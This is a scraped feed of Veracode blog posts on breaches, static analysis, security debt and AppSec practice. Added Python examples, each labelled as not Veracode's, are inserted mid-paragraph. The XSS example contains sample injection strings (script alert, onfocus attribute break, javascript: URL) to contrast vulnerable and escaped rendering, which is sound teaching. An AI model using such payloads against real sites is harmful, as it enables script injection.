Application Security Research, News, and Education Blog
6 Noteworthy Data Breaches in 2019
<img src="/sites/default/files/styles/resize_960/public/2020-02/Top%20Breaches.png?itok=XYyp_GDM" width="960" height="480" alt="" typeof="foaf:Image" />
<p class="MsoNormal" style="tab-stops:79.85pt">2019 was a banner year for breaches. Some of the biggest victims included social media heavy-hitters Facebook and TikTok, as well as financial dynamo Capital One. They’re just the tip of the iceberg: according to Forbes, over <a href="">3,000 breaches</a> in 2019 tallied up to 4.1 billion compromised data records. That’s a whopping 22.5 million records stolen by cyberattackers every day of last year.</p>
<p class="MsoNormal" style="tab-stops:79.85pt">We know from our 10<sup>th</sup> annual <a href="//">State of Software Security</a> (SOSS) report that security debt is a major contributor to the risk of such breaches and attacks. We also learned that those who scan their code for security issues more frequently (300+ times per year) vastly reduce the amount of debt (and risk) they carry. <a href="//">DevSecOps</a> programs that institute more frequent application scanning cadences and break down silos between security and development teams can be a leap forward for organizations like the ones that fell victim to attacks last year.</p>
<p class="MsoNormal">As cybersecurity becomes a more complex issue, businesses that handle sensitive data (from passwords to Social Security numbers, banking information, and even medical records) should take this ever-prevalent problem seriously in 2020 and beyond.
Here’s a look at six of the biggest breaches we saw in 2019.</p>
Fri, 14 Feb 2020 16:03:36 -0500 (mmcbee) ver46886
Veracode’s New Scan Type Delivers Results at DevSecOps Speed
<img src="/sites/default/files/styles/resize_960/public/2020-02/shutterstock_1091557088-min.png?itok=vxIYHTWF" width="960" height="480" alt="" typeof="foaf:Image" />
<p>Across the thousands of customer conversations we have each year, one theme continues to emerge regardless of industry, size, or geography: the pace of development is accelerating rapidly, and the pressure to innovate quickly is more intense than ever before. Veracode’s customers are not alone. A recent <a href="">GitLab survey</a> of more than 4,000 global developers found that 43 percent of teams now deploy on demand or multiple times a day, and nearly the same share, 41 percent, deploy between once a day and once a month.</p>
<p>In response to this development evolution, Veracode is evolving as well. Security testing that can’t keep up or, worse, slows developers down will be under-utilized or ignored in this fast-paced environment. To that end, we’re announcing the latest evolution of our Static Analysis solution, in which we bring together two existing scan types and introduce a new, first-of-its-kind scan type. The result is a comprehensive Static Analysis product family optimized to integrate security testing into every stage of the development pipeline, giving teams the right scan, at the right time, in the right place.</p>
<p style="margin-bottom:11px"><img alt="Veracode's Static Analysis family" data-entity-type="file" data-entity-uuid="5dc40d34-1274-46e9-afca-430cd4c5528a" src="//" /></p>
<p><b>IDE Scan</b></p>
<p>From the first line of the code, the IDE Scan provides focused, real-time security feedback to developers as they code.
This scan, which <i>returns results within seconds</i>, helps developers remediate faster through code examples and reinforces secure coding skills with visual positive reinforcement as they work. Companies using the IDE Scan have reduced the flaws introduced into new code by 60 percent.</p>
<p><b>Pipeline Scan</b></p>
<p><img alt="Results of Veracode Pipeline Scan" data-entity-type="file" data-entity-uuid="eec83a41-836d-4337-97d7-122c49001f86" src="//" /></p>
<p>The first of its kind in the market, the new Pipeline Scan runs on every build, providing security feedback on the code at the team level, with a <i>median scan time of 90 seconds</i>. This scan embeds directly into teams’ CI tooling and provides fast feedback on flaws introduced by new commits. Teams can break the build if policy-violating flaws, based on severity or CWE category, are introduced on a commit, or if net-new security issues are found. Because this scan is built in line with best-in-class CI tooling, there is no learning curve for development.</p>
<p><b>Policy Scan</b></p>
<p>Before releasing the software, a Policy Scan completes a full assessment of the code, with an audit trail for compliance purposes, in a <i>median scan time of 8 minutes</i>. This scan evaluates applications against security policy, delivering a clear pass/fail result. Security teams and development managers gain broad visibility across their applications and the continuous feedback they need to proactively improve their overall security posture.</p>
<p>Each scan runs on the Veracode Static Analysis Engine, which had a <i>developer-verified false positive rate of less than 1.1 percent</i> across more than 7 million scans in 2019, without manual tuning.
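The build-breaking behaviour described for the Pipeline Scan (block on severity or CWE category, or on net-new findings) can be reproduced in any CI job with a small policy gate. The block below is an added example written for this post, not Veracode's own code, and it does not use Veracode's result format: the JSON layout, the 1 to 5 severity scale, the CWE list, and the way a finding is matched against the baseline are all assumptions.

```python
"""Minimal CI policy gate: fail the build on net-new findings that violate policy.

Added example; not Veracode's code or its result format. The JSON shape,
the 1-5 severity scale and the blocked-CWE list are assumptions for illustration.
"""
import json
import sys
from dataclasses import dataclass

# Constructed sample data: the baseline from the last passing build and the
# findings from the current commit. Same (cwe, file, line) => same finding.
BASELINE_JSON = """[
  {"id": "f1", "cwe": 79,  "severity": 4, "file": "views.py",   "line": 42},
  {"id": "f2", "cwe": 330, "severity": 2, "file": "tokens.py",  "line": 7}
]"""
CURRENT_JSON = """[
  {"id": "f1", "cwe": 79,  "severity": 4, "file": "views.py",   "line": 42},
  {"id": "f3", "cwe": 89,  "severity": 5, "file": "queries.py", "line": 18},
  {"id": "f4", "cwe": 117, "severity": 1, "file": "log.py",     "line": 3}
]"""


@dataclass(frozen=True)
class Finding:
    cwe: int
    severity: int
    file: str
    line: int

    @property
    def key(self):
        # Stable identity across scans, so renumbered scanner ids do not look "new".
        return (self.cwe, self.file, self.line)


@dataclass(frozen=True)
class Policy:
    min_severity: int          # block findings at or above this severity
    blocked_cwes: frozenset    # always block these CWE categories, whatever the severity


def load_findings(text):
    return [Finding(d["cwe"], d["severity"], d["file"], d["line"]) for d in json.loads(text)]


def net_new(current, baseline):
    """Findings present in the current scan but absent from the baseline."""
    seen = {f.key for f in baseline}
    return [f for f in current if f.key not in seen]


def violations(findings, policy):
    """Findings that break the build under the given policy."""
    return [f for f in findings
            if f.severity >= policy.min_severity or f.cwe in policy.blocked_cwes]


def gate(current, baseline, policy):
    """Return (passed, violations): passed is False when any net-new finding violates policy."""
    bad = violations(net_new(current, baseline), policy)
    return (len(bad) == 0, bad)


if __name__ == "__main__":
    policy = Policy(min_severity=4, blocked_cwes=frozenset({79, 89}))
    ok, bad = gate(load_findings(CURRENT_JSON), load_findings(BASELINE_JSON), policy)
    for f in bad:
        print(f"BLOCK CWE-{f.cwe} severity {f.severity} at {f.file}:{f.line}")
    sys.exit(0 if ok else 1)
```

Run it as a step after the scanner writes its results; the non-zero exit status is what the CI system turns into a failed build. Matching on (CWE, file, line) rather than on a scanner-assigned id keeps previously accepted findings from resurfacing as "new" on every commit, with the caveat that an edit above the flaw shifts the line and surfaces it again, which is why real tools use a more tolerant fingerprint.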
Teams benefit from the assurance that they are getting consistent, accurate results alongside clear guidance on which issues to focus on and how to fix them faster, without compromising on development velocity.</p>
<p><b>Putting it into practice</b></p>
<p>After struggling with a center-of-excellence approach, the security team at one of our customers, a large telecommunications firm, supported development by providing access to a variety of different static analysis solutions. While they were empowered by tooling choice, the development team still wasn’t having success remediating risk or scaling the program and was frustrated with inconsistent results.</p>
<p>The development team decided to standardize on one solution and, upon completion of a thorough assessment process, selected Veracode. Using a combination of scans with Veracode Static Analysis across the SDLC, they were able to scale the program to more than 1,300 applications, resolve more than 270,000 security flaws, and reduce the number of new flaws introduced by more than 60 percent, all in just 90 days.</p>
<p><b>Learn more</b></p>
<p>To get more details on Veracode Static Analysis, download our <a href="//">technical whitepaper</a>.</p>
Thu, 13 Feb 2020 09:00:31 -0500 (boshea) ver46676
Veracode Channel Leader Leslie Bois Earns Top Channel Recognition from CRN
<img src="/sites/default/files/styles/resize_960/public/2020-02/Leslie%20Bois%20headshot-min.png?itok=jAU63XMJ" width="960" height="480" alt="" typeof="foaf:Image" />
<p>Leslie Bois, Veracode’s Vice President of Global Channels and Alliances, has been selected to the esteemed <a href="">CRN 2020 Channel Chiefs list</a> for the third consecutive year, a reflection of the hard work, growth, and influence she’s introduced since joining Veracode in 2017.</p>
<p>Bois is responsible for developing and executing Veracode’s global strategy to build a strong partner network, which plays a significant role in the company’s go-to-market efforts.
She works cross-functionally to align all aspects of the business to help channel partners grow their client list with Veracode’s platform of leading <a href="">application security</a> solutions.</p>
<p>Under her leadership, Veracode’s channel pipeline has grown exponentially over the past 12 months, and we’re proud to have formed hundreds of partner relationships around the world, including in emerging markets such as Asia, Latin America, Europe, and the Middle East. Alongside this growth, Veracode is investing significantly in the further development of our global channel initiatives across multiple regions.</p>
<p>“I’m honored to receive this recognition from CRN. I think it’s a true testament to the dedication and commitment from Veracode to enable security at the speed of development for companies around the world,” said Bois. “The application security market is gaining momentum, and our focus in 2020 will be continuing to ensure that our partners across the globe are positioned to confidently provide the solutions and training businesses need to secure their software. Through dedicated partner engagement, we aim to bring our best-in-class application security platform to more businesses via our channel network.”</p>
<p>Each of the 2020 Channel Chiefs is among the cream of the IT channel crop: leaders who drive the channel agenda and evangelize the importance of channel partnerships. Channel Chief honorees are selected by CRN’s editorial staff on the basis of their professional achievements, standing in the industry, dedication to the channel partner community, and strategies for driving future growth and innovation.</p>
<p>“The IT channel is undergoing constant evolution to meet customer demands and changing business environments,” said Bob Skelley, CEO of The Channel Company.
“CRN’s Channel Chiefs work tirelessly, leading the industry forward through superior partner programs and strategies with a focus on helping solution providers transform and grow. Our team here at The Channel Company congratulates these outstanding individuals for their dedication to the channel.”</p>
<p>Visit <a href="">here</a> to find out more about partnering with Veracode.</p>
Wed, 12 Feb 2020 09:54:38 -0500 (vlattell) ver46761
What Our Data Reveals About Security Debt
<img src="/sites/default/files/styles/resize_960/public/2020-02/Security%20Debt.png?itok=4BEnRYfg" width="960" height="480" alt="" typeof="foaf:Image" />
<p>It’s a habitual practice we learn from an early age: keeping track of loans and credit card bills reduces overall debt and makes it easier to bring debt down quickly, avoiding those pesky spikes in interest. That very same practice applies to software security testing. Software is tested, vulnerabilities are revealed, and unaddressed vulnerabilities build up over time as interest in the form of extra work, which compounds into security debt that’s increasingly difficult to reduce the longer you wait.</p>
<p>Often, the solution is reprioritizing flaws and improving fix rates to reduce liability over time. In our 10<sup>th</sup> annual <a href="//">State of Software Security</a> (SOSS X) report, we discuss how some of our findings from over 85,000 application scans correlate with mounting security debt, and why you should pay attention.</p>
<h4><strong>Debt dwindles with frequent scanning</strong></h4>
<p>Just as making consistent payments on your credit card reduces debt over time, a frequent scanning cadence can lower the amount of debt your organization carries.
When surveying the findings in our SOSS X report, we saw that frequent scanners (300+ scans per year) carry 5x less debt than infrequent scanners and see a 3x reduction in median time to remediation (MedianTTR), the amount of time it takes to fix flaws.</p>
<div style="text-align:center"><img alt="Scanning Cadence" data-entity-type="file" data-entity-uuid="cc31d22a-f61a-4225-a2b9-ec9747cda803" src="//" /></div>
<h4><strong>Misaligned remediation priorities add to interest</strong></h4>
<p>In SOSS X, we talk about how some developers operate on LIFO (Last In, First Out) or FIFO (First In, First Out) methods for fixing flaws. Standard remediation procedures are not one size fits all: what works for your organization may not work for another. But the data we studied shows that the likelihood of a flaw being fixed in the first month is only about 22 percent. That number drops to 10 percent for the second month and to 3 to 5 percent as time goes on.</p>
<div style="text-align:center"><img alt="Remediation Time" data-entity-type="file" data-entity-uuid="17e120be-988c-48d0-bd16-5ad456d89f5f" src="//" /></div>
<p>It’s clear from this data that developers are prioritizing the most recently found flaws above all else. The problem with this process is that it doesn’t take into account what is actually increasing risk. Ultimately, an older Cross-Site Scripting vulnerability is just as dangerous as a more recently discovered one. However, this chart sheds light on the relationship between scanning cadence and security debt: if we’re paying more attention to recently discovered flaws, frequent scanning means additional newer flaws to address. Boosting your scanning cadence and sitting down as a team to figure out your approach to prioritizing flaws can help set you on the right path.</p>
<h4><strong>Some industries are more prone to debt than others</strong></h4>
<p>Security debt doesn’t discriminate.
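The metrics used in the sections above (debt as the backlog of open findings, MedianTTR, and the likelihood that a flaw is fixed in its first, second, or a later month) can be computed from a plain list of findings with found and fixed dates. The block below is an added example, not Veracode's code and not SOSS X data: the eight findings are constructed, and the 30-day month and the rule that a finding counts toward a month only once it has been observed for that whole month are assumptions.

```python
"""Security-debt metrics from scan findings: open debt, MedianTTR and per-month fix likelihood.

Added example; not Veracode's code and not SOSS X data. The findings below are
constructed, and the 30-day "month" is an assumption.
"""
from dataclasses import dataclass
from datetime import date
from statistics import median
from typing import Optional


@dataclass(frozen=True)
class Finding:
    flaw_id: str
    found: date
    fixed: Optional[date] = None   # None => still open, i.e. part of the debt

    @property
    def ttr(self):
        """Time to remediation in days, or None while the finding is still open."""
        return None if self.fixed is None else (self.fixed - self.found).days


# Constructed sample: eight findings from one application's scan history.
SAMPLE = [
    Finding("a", date(2019, 10, 1), date(2019, 10, 15)),
    Finding("b", date(2019, 10, 1), date(2019, 11, 20)),
    Finding("c", date(2019, 10, 1)),
    Finding("d", date(2019, 11, 10), date(2019, 11, 30)),
    Finding("e", date(2019, 11, 10)),
    Finding("f", date(2019, 12, 5), date(2020, 1, 20)),
    Finding("g", date(2020, 1, 15)),
    Finding("h", date(2019, 10, 1), date(2020, 1, 10)),
]
AS_OF = date(2020, 1, 31)   # the day the report is produced


def open_debt(findings, as_of):
    """Number of open findings and the age in days of the oldest one."""
    ages = [(as_of - f.found).days for f in findings if f.fixed is None]
    return len(ages), (max(ages) if ages else 0)


def median_ttr_days(findings):
    """MedianTTR over the findings that have actually been fixed (None if none have)."""
    fixed = [f.ttr for f in findings if f.ttr is not None]
    return median(fixed) if fixed else None


def fix_probability_by_month(findings, as_of, month_days=30):
    """Share of findings still open at the start of month k that get fixed during month k.

    A finding counts toward month k only if it has been observed for that whole month,
    so freshly discovered flaws do not drag the estimate down. Returns {k: fraction}
    and stops at the first month for which no finding is old enough.
    """
    result = {}
    k = 1
    while True:
        start, end = (k - 1) * month_days, k * month_days
        at_risk = [f for f in findings
                   if (as_of - f.found).days >= end            # full month observed
                   and (f.ttr is None or f.ttr >= start)]      # still open when month k began
        if not at_risk:
            break
        fixed_in_month = [f for f in at_risk if f.ttr is not None and f.ttr < end]
        result[k] = len(fixed_in_month) / len(at_risk)
        k += 1
    return result


if __name__ == "__main__":
    count, oldest = open_debt(SAMPLE, AS_OF)
    print(f"open debt: {count} findings, oldest is {oldest} days old")
    print(f"MedianTTR: {median_ttr_days(SAMPLE)} days")
    for month, p in fix_probability_by_month(SAMPLE, AS_OF).items():
        print(f"month {month}: {p:.0%} of the flaws still open were fixed")
```

The per-month figure is conditional on the flaw still being open at the start of that month, which is the reading that makes the report's falling percentages meaningful: a flaw that survives its first two months is the one that turns into long-lived debt, and MedianTTR only reflects what was fixed, so the open backlog has to be reported alongside it.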
It shows up in every industry, though some are more likely to accrue debt than others depending on how they prioritize fixes over time, as previously discussed. Data from SOSS X shows us that the Manufacturing and Government/Education industries carry more debt on average than other prominent industries.</p>
<div style="text-align:center"><img alt="Security Debt by Industry" data-entity-type="file" data-entity-uuid="ba22b07b-d4c6-4875-a078-da5b5cf48329" height="288" src="//" width="488" /></div>
<p>What’s most important to note, though, are the trends over time. For example, we can see that around month four, organizations in Government and Education have an uptick in average fix rates. While Retail doesn’t carry much debt overall, companies there tend to remediate the bulk of their flaws by month six or seven, contributing to debt reduction.</p>
<p>Security needs vary (capturing quick payment information versus storing robust patient histories and treatment plans, for example), but data from your specific industry will help you keep a pulse on average fix rates for security debt. You and your team can then review this data on a consistent basis when creating long-term plans for eliminating flaws.</p>
<h4><strong>PHP and C++ build up debt the fastest</strong></h4>
<p>Your plans for fixing flaws and reducing debt should factor in the languages you’re using. Why? The average security debt for PHP and C++ is huge and tends to grow over time, especially when compared to .NET, Android, Java, and JavaScript.</p>
<div style="text-align:center"><img alt="Language Flaw Debt" data-entity-type="file" data-entity-uuid="7868b330-a87f-43c7-8b15-462d040b291f" src="//" /></div>
<p>Issues with these two languages are the result of simplicity and age: PHP is suited to beginners and is thus susceptible to insecure coding, while C++ is a powerful language that requires hands-on management of memory and the stack, and the resulting vulnerabilities are easier to introduce in C++ than in more common languages.</p>
<p>It’s difficult for most teams to change the language they’re using at work, but it’s important to keep in mind which languages easily add to security debt. Carrying this awareness and understanding changes in language trends will help you prepare efficient security processes throughout your career.</p>
<h4><strong>Cross-Site Scripting carries the heaviest liability for debt</strong></h4>
<p>When we look at the layers of flaw percentage by application age, it’s apparent that <a href="//">Cross-Site Scripting</a> (A7-XSS) carries the largest amount of debt across applications. There’s also a slight rise in percentage as we inch closer to the 7-month mark, which tells us that XSS (among others) is a notable contributor to security debt.</p>
<div style="text-align:center"><img alt="Cross-site Scripting" data-entity-type="file" data-entity-uuid="721fc440-97f2-4810-ab99-fc281724d80a" src="//" /></div>
<p>XSS attacks occur when a malicious script is injected into a webpage and alters the way that page behaves, opening the site to unwanted activity such as bypassing authentication or stealing sensitive information. This prominent flaw is not picky when it comes to language, either, with notable findings in .NET, iOS, Java, JavaScript, PHP, and Python. Spanning languages with prevalence and risk, XSS is one to keep an eye on as you work towards reducing your security debt.</p>
<h4><strong>Read the full SOSS X report</strong></h4>
<p>Want more info? Check out our <a href="//">SOSS X page</a> for the full report and additional data to absorb as we head into 2020.
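To make the XSS description above concrete, here is a vulnerable rendering helper next to its hardened form, in both the HTML text context and the attribute context, plus the URL case where escaping alone is not sufficient. This is an added example, not code from the post; the helper names, the constructed inputs and the allowed-scheme list are assumptions.

```python
"""Cross-Site Scripting: a vulnerable rendering helper next to its hardened form.

Added example, not code from the post. The helper names, the constructed inputs
and the allowed URL schemes are assumptions for illustration.
"""
import html
from urllib.parse import urlsplit

# Constructed user-supplied values, as they might arrive in a request.
NAME_INPUT = '<script>alert("xss")</script>'
QUERY_INPUT = '" autofocus onfocus="alert(1)'
LINK_INPUT = "javascript:alert(1)"


def render_greeting_unsafe(name):
    """Vulnerable: untrusted input is concatenated straight into HTML text."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name):
    """Hardened: escape on output, so the input renders as text, never as markup."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def render_search_box_unsafe(query):
    """Vulnerable: an unescaped value inside an attribute lets input close the attribute."""
    return f'<input name="q" value="{query}">'


def render_search_box_safe(query):
    """Hardened: quote=True also escapes the quote characters the attribute relies on."""
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def safe_href(url):
    """Escaping alone is not enough in a URL context: keep only http(s) links."""
    if urlsplit(url.strip()).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def has_executable_markup(rendered):
    """Cheap self-check for this demo: did input-derived markup or an event handler
    survive into the output? Not a substitute for a sanitizer or a scanner."""
    lowered = rendered.lower()
    return "<script" in lowered or 'onfocus="' in lowered


if __name__ == "__main__":
    for label, out in [
        ("greeting (unsafe)", render_greeting_unsafe(NAME_INPUT)),
        ("greeting (safe)", render_greeting_safe(NAME_INPUT)),
        ("search (unsafe)", render_search_box_unsafe(QUERY_INPUT)),
        ("search (safe)", render_search_box_safe(QUERY_INPUT)),
    ]:
        print(f"{label}: {'VULNERABLE' if has_executable_markup(out) else 'ok'}  {out}")
    print("href:", safe_href(LINK_INPUT), safe_href("https://example.com/?a=1&b=2"))
```

The fix is contextual output encoding at the point where untrusted data meets markup; in practice a template engine with auto-escaping enabled (and kept enabled) does this for the text and attribute cases, while URL and script contexts still need their own rules, which is where static analysis earns its keep by flagging data that reaches the page without passing through any of them.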
You can also listen to our <a href="">podcast series with IDG</a>, in which three of the episodes dig into security debt to drill down on different industries, why security debt grows deeper, and what's behind the buildup of unfixed flaws.</p>
Wed, 05 Feb 2020 11:02:34 -0500 (mmcbee) ver45926
Best Practices and Practical Steps to Guide Your AppSec Journey
<img src="/sites/default/files/styles/resize_960/public/2020-01/water-and-compass.png?itok=r3wgo4Qy" width="960" height="480" alt="" typeof="foaf:Image" />
<p>Imagine that you are tasked with planning a vacation for you and your family. For your ideal trip, you would jet off to a five-star resort on a private island for a month of pampering and fine dining. But, since you have two children, a limited budget, and only one week of paid time off, you settle for a three-star theme park resort with a spa and outdoor pool. Your family has a great time on the vacation and, using your new-found trip planning skills, you start preparing and saving for your dream getaway.</p>
<p>Spearheading an application security (AppSec) program can sometimes feel a little like that type of vacation planning: you can see an ideal state, but it can feel unattainable. Just like planning a vacation, creating an AppSec program is also dependent on time and money, as well as an organization’s staff expertise, culture, and executive support.</p>
<p>Below, we look at both the best practices and some practical first steps you can take that will prepare your AppSec program for improvements in the future. In other words, keep your eye on the private-island AppSec while moving forward with the theme-park AppSec.</p>
<h4><strong>Best Practice #1:</strong> <strong><em>Use More Than One Application Security Testing Type</em></strong></h4>
<p style="margin-left:.5in;">When you visit the doctor with an ailment, you undergo several tests to determine the diagnosis. There is no magic test that detects all illnesses.
The same goes for AppSec tests: there is no one test that detects every vulnerability. So, to make sure that your application is fully secure, the best practice is to use <a href="">as many testing types</a> as possible.</p>
<h4><strong>Practical Advice:</strong> <strong><em>Start with What Makes the Most Sense, Then Add More Later</em></strong></h4>
<p style="margin-left:.5in;">Develop an AppSec strategy to determine where you need AppSec solutions the most. Start by implementing the tests that will have the most impact, in the shortest amount of time, for the least amount of money. From there, you can start adding more tests.</p>
<p style="margin-left:.5in;">Several factors will help determine which tests will have the most impact. For example, if you have multiple applications, rank them based on the criticality of their risks, and test the applications with the most critical risks first. Another thing to consider is programming languages. If you use less-mainstream programming languages, there are limitations on the AppSec tests you can use, so start with tests that are not language-specific, like dynamic or penetration testing.</p>
<h4><strong>Best Practice #2: </strong><strong><em>Shift Security Left</em></strong></h4>
<p style="margin-left:.5in;">In today’s fast-paced world, enterprises are moving from yearly product releases to monthly, weekly, or daily releases. To keep up with this change, security testing needs to be woven <em>into</em> the development cycle instead of bolted on <em>after</em> it. That way, when it is time to release the product, security testing will not stand in the way.</p>
<h4><strong>Practical Advice: </strong><strong><em>Shift Security Culture Left</em></strong></h4>
<p style="margin-left:.5in;">Moving security testing into the development cycle means that developers will play a bigger security role.
Since most development and security teams have never worked together, “shifting security left” can be a significant cultural change.</p>
<p style="margin-left:.5in;">Before making this change, a good first step is to help security understand how development works and to <a href="">build a relationship</a>. Understanding how development works involves learning their tools and process, as well as how they build software, so that security testing can be integrated organically. When security is organically woven into the development process, developers are more likely to be receptive to security, making it easier to forge trusting relationships.</p>
<p style="margin-left:.5in;">You should also look for ways to automate security testing in the CI/CD pipeline. By integrating automated security tools into the CI/CD pipeline, you can incorporate testing without handing off code to another team, making it easier for developers to fix issues immediately.</p>
<h4><strong>Best Practice #3: </strong><strong><em>Fix Everything Fast</em></strong></h4>
<p style="margin-left:.5in;">Finding vulnerabilities is only half of the battle. You need to have a solid plan in place to fix them once they are discovered. Automating security testing in CI/CD pipelines allows organizations not only to find flaws faster but also to speed up the remediation process.</p>
<h4><strong>Practical Advice: </strong><strong><em>Prioritize Fixes While Creating Fewer Vulnerabilities</em></strong></h4>
<p style="margin-left:.5in;">As much as we would love to fix all flaws instantaneously, it is not possible. A practical first step in remediation is <a href="//">prioritizing</a>.
When prioritizing your flaws, do not concentrate on defect severity alone; also consider the criticality of the application and how easy it would be to exploit the flaw.</p>
<h4><strong>Best Practice #4: </strong><strong><em>Embed Security Champions into Development Teams</em></strong></h4>
<p style="margin-left:.5in;">Most developers do not have a security background. This makes it very challenging when you try to implement security tests in the development lifecycle. One way to help fill this knowledge gap is to select interested volunteers from the development teams to become <a href="//">security champions</a>. Security champions learn about security testing and can relay important security messages back to their teams.</p>
<h4><strong>Practical Advice: </strong><strong><em>Build Up Your Security Champions’ Capabilities</em></strong></h4>
<p style="margin-left:.5in;">Building a team of security champions takes time. Start by making sure your organization’s security, development, and leadership teams are all on board with the security champions concept. Once everyone agrees with the idea, help the security and development teams build a relationship. If developers and security personnel are on good terms, you have a much better chance of developers agreeing to become security champions.</p>
<p style="margin-left:.5in;">Next, identify your champions. Security champions should be selected based on a demonstrated or perceived interest in learning more about security. If you select developers who do not have an interest in security, there is a high probability that they will not be successful in the role.
Lastly, nurture your identified champions by giving them the appropriate tools and support needed for success, like additional training in security concepts and code reviews.</p>
<h4><strong>Best Practice #5: </strong><strong><em>Measure Your AppSec Results</em></strong></h4>
<p style="margin-left:.5in;">It’s critical to be able to measure and report on the success of an AppSec program in metrics. Identify which metrics are most important to your organization’s key decision-makers, then display the metrics in an easy-to-understand, actionable manner.</p>
<h4><strong>Practical Advice: </strong><strong><em>Focus on Your Policy Metric</em></strong></h4>
<p style="margin-left:.5in;">Bringing too many metrics to your executives early on can be overwhelming and, quite frankly, unnecessary. Start by presenting one metric: how your AppSec program is complying with your internal AppSec policy. From there, you can start sharing other valuable metrics.</p>
<p>Remember, just like saving for your dream getaway, creating the perfect AppSec program takes time. But taking practical steps and looking toward the big picture will help you get closer to perfect sooner.</p>
<p>Learn more about the steps you can take to achieve AppSec maturity in our recent guide, <a href=""><em>Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start</em></a>.</p>
Fri, 31 Jan 2020 10:00:02 -0500 (hgoslin) ver45921
What Software Composition Analysis and Your Dentist Have in Common
<img src="/sites/default/files/styles/resize_960/public/2020-01/dentist-min.png?itok=09BgUosf" width="960" height="480" alt="" typeof="foaf:Image" />
<p>SAST, DAST, IAST, SCA … confused about the differences? We thought it might be helpful to clear things up by using the analogy of human health. When you visit the doctor with an ailment, or even for a routine checkup, you are likely to undergo a series of tests to find potential health conditions or diseases.
Since the tests target different parts of the mind or body, the results may vary. So, the more tests performed, the better the chances of discovering and treating an illness. The same logic applies to security health. The more application security tests performed, the better the odds that you will find and remediate security flaws or vulnerabilities.</p>
<p>Now that we understand the importance of application security tests, and we know that they look for different vulnerabilities and flaws, how can we distinguish between them? We will continue with the human health analogy, comparing AppSec tests to common, easy-to-understand health tests.</p>
<h4><strong>Static analysis</strong></h4>
<p>Make no bones about it, static analysis is very similar to an X-ray. Just like X-rays, which produce a static image to find torn and broken bones, static analysis evaluates an application from the inside out, reviewing stationary code for security vulnerabilities. By catching the vulnerabilities before running the application, developers can fix flaws in a timely, cost-efficient manner.</p>
<h4><strong>Dynamic analysis</strong></h4>
<p>Dynamic analysis is comparable to a reflex test. During a reflex test, the doctor taps a tendon to make sure that the patient’s motor and sensory skills are intact. Dynamic analysis uses a similar outside-in approach, poking and prodding at the running application to find vulnerabilities.</p>
<h4><strong>Software composition analysis</strong></h4>
<p>For software composition analysis (SCA), think of a dental exam. During a dental exam, if you have had cavities, your fillings are inspected. Although fillings are not an organic part of the body, faulty dental fillings that go undetected and untreated can lead to serious illness. This concept is a lot like software composition analysis. SCA inspects open source code for vulnerabilities.
This is code that you didn't write yourself, but it still affects the security and health of the application. Despite the fact that open source is a third-party component, if its vulnerabilities go undetected, it is nothing to smile about.</p>
<h4><strong>Interactive analysis</strong></h4>
<p>Interactive analysis can best be compared to an electrocardiogram (EKG). For an EKG, a doctor puts electrodes on your chest to measure your heart rate. The doctor might have you exercise while conducting the EKG to evaluate your heart under stress. With interactive analysis, you place an agent in the runtime environment and put the application under load. From there, you can see what vulnerabilities the agent discovers.</p>
<h4><strong>Penetration test</strong></h4>
<p>A penetration test is the equivalent of a doctor’s personal assessment. When you visit the doctor and convey your symptoms, the doctor uses their expertise to provide a diagnosis. It is not unusual for the doctor to pick up on an illness that is undetectable by an exam. Similarly, in a penetration test, an expert penetration tester simulates a security attack on the application to find vulnerabilities that are often undetectable by other, more automated methods.</p>
<p>So, the next time you visit the doctor and undergo several tests, remember that each test holds a purpose. And when it is time to evaluate your AppSec program, remember that the same logic holds true. The more security tests you are able to perform, the better the chances of catching vulnerabilities.</p>
<h4><strong>Learn More</strong></h4>
<p>Get more details on the strengths and weaknesses of the different AppSec testing types in our recent guide, <a href=""><em>Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start</em></a>.</p>
Wed, 29 Jan 2020 09:56:01 -0500 (hgoslin) ver45916
Forrester Study on the Benefits of Cloud vs. On-Premises AppSec
<img src="/sites/default/files/styles/resize_960/public/2020-01/clouds-min.png?itok=GPgd8occ" width="960" height="480" alt="" typeof="foaf:Image" />
<p>Veracode recently commissioned Forrester Consulting to conduct research on the Total Economic Impact™ of using a cloud-based application security (AppSec) solution versus an on-premises solution. To collect information on the benefits and risks associated with the solutions, Forrester interviewed four customers who have used Veracode as well as a variety of on-premises application security solutions. The data presented four business benefits and average cost savings associated with using SaaS-based AppSec:</p>
<h4 style="margin-left: 0.5in;"><strong>Improved speed to scale saves 200 hours annually</strong></h4>
<p style="margin-left:.5in;">On average, it takes approximately 33 hours to set up an AppSec server and 216 hours for annual maintenance. By using a cloud-based solution, like Veracode, organizations avoid server costs, which improves speed to scale and saves more than $1.3 million over three years.</p>
<h4 style="margin-left: 0.5in;"><strong>Faster time to market leads to an additional $888,000 in annual profit</strong></h4>
<p style="margin-left:.5in;">Veracode Greenlight is a unique tool that performs security scans as developers are coding. By catching flaws during development, code is updated faster, and products and updates are typically released three months sooner than if post-deployment scans were conducted. Gaining an additional three months of profit on every application could translate to millions saved over the course of a few years.</p>
<h4 style="margin-left: 0.5in;"><strong>Annual legacy application costs of $1.86 million are avoided</strong></h4>
<p style="margin-left:.5in;">The study found that Veracode costs 20 percent less to operate than on-premises solutions.
This means that by moving all legacy applications to a cloud-based solution, an organization would have lower operating costs, which could save, on average, almost $3.9 million over three years.</p> <h4 style="margin-left: 0.5in;"><strong>Real-time flaw identification saves $4.4 million over three years</strong></h4> <p style="margin-left:.5in;">Veracode Greenlight not only leads to increased profits, it also leads to increased productivity for developers. Since they are able to see flaws while coding, they can make real-time edits, eliminating rework down the line. And the more productive developers are at eliminating flaws, the more productive the security teams are. This could lead to an average productivity savings of approximately $4.4 million over three years.</p> <p>Download the full study, <em><a href="">SaaS vs. On-premises: The Total Economic Impact™ of Veracode's SaaS-based Application Security Platform</a></em>, for a detailed analysis of cost savings and business benefits. In the report, you will also find additional baseline benefits attributed to using Veracode, as well as a comprehensive overview of the platform.</p> Mon, 27 Jan 2020 11:04:59 -0500 (hgoslin) ver45826 Forrester Analysis on the State of Government Application Security: Government Must Make Significant Advances <img src="/sites/default/files/styles/resize_960/public/2020-01/government-min.png?itok=34kdg1kk" width="960" height="480" alt="" typeof="foaf:Image" /><p>In a recent report, <a href=""><em>The State of Government Application Security, 2020</em></a>, Forrester analysts establish that governments are far behind other industries in critical areas of application protection. This finding, backed by the Forrester Analytics 